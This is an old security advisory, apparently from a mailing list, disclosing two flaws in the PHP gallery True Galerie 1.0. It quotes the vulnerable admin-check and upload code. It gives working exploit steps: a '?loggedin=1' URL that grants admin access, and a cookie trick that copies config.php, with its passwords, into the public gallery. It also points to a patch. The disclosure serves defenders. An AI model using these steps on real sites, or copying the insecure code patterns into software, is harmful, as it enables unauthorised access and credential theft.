True Galerie 1.0 : Admin Access & File Copy

["Frog Man" <leseulfrog () hotmail com>]

Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.truelogik.net
Version : 1.0
Problems :
- Admin Access
- File Copy


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
verif_admin.php, check_admin.php :

------------------------------------------------------------------------

<?
if(isset($connect)) {
        if($connect=="$passadmin") setcookie("loggedin","ok");
        if($connect=="no") setcookie("loggedin");
        Header("Location: ".$PHP_SELF);
}

$ok = ($loggedin!="");

if($ok) {
        echo "<center>";
        echo "<table>";
	echo "<tr><td align='center'><a 
href='?connect=no'>DECONNEXION</a></td></tr>";
        echo "</table>";
        echo "</center>";
}
else {
        echo "<center><form method='post'>";
        echo "<table>";
        echo "<tr><td align='center'>CONNEXION</td></tr>";
        echo "<tr><td align='center'>Password : admin</td></tr>";
        echo "<tr><td><input type='password' name='connect'></td></tr>";
        echo "<tr><td><input type='submit' value='Login'></td></tr>";
        echo "</table>";
        echo "</form></center>";
}
?>

------------------------------------------------------------------------




upload.php :

----------------------------------------------------------------------
[...]
$userip = $REMOTE_ADDR;
$pseudo = $_POST['pseudo'];
$message = $_POST['message'];
$email = $_POST['email'];
[...]
if((!$pseudo) || (!$message) || (!$file)) {
        [...]
        exit;
}

if(!ereg('^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'.
       '@'.
       '[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'.
       '[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$',
       $email))
        {
        [...]
        exit();
}

[...]

if ($file_size >= $MAX_FILE_SIZE)
        {
        [...]
        exit();
}

if($HTTP_POST_FILES['file']['type']=="image/pjpeg") {
        $ext="jpg";
}
elseif($HTTP_POST_FILES['file']['type']=="image/gif") {
        $ext="gif";
}
if($HTTP_POST_FILES['file']['type']=="image/pjpeg"|$HTTP_POST_FILES['file']['type']=="image/gif") 
{

$date = time();

$query = "INSERT INTO $tablegalerie 
(cat_id,pseudo,email,url,message,date,clicks,img,userip) 
VALUES('$cat_id','$pseudo','$email','$url','$message','$date','','','$userip')";

mysql_query($query);

$id=mysql_insert_id();
$random_name = makeRandomName();

$dest_file="./$folder/$random_name.$ext";

$query = "UPDATE $tablegalerie SET img='$dest_file' WHERE id='$id'";
mysql_query($query);

$res_copy=@copy($file,$dest_file);
@move_uploaded_file($file,$dest_file);
----------------------------------------------------------------------



Exploits :
°°°°°°°°°°
- To be admin :
http://[target]/admin.php?loggedin=1


- To read config.php (with admin password, DB password,...) :
1) Set a cookie named "file" and with the value "config.php" on 
http://[target]/form.php
2) Fill the form on this form.php page (the image have to be a real image, 
.gif or .jpg !)
3) Submit the form
4) Go on the index, look at your file (the last registered image)
5) Read it : it's config.php.


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/TrueGalerie.txt




frog-m@n







_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/messengerparsms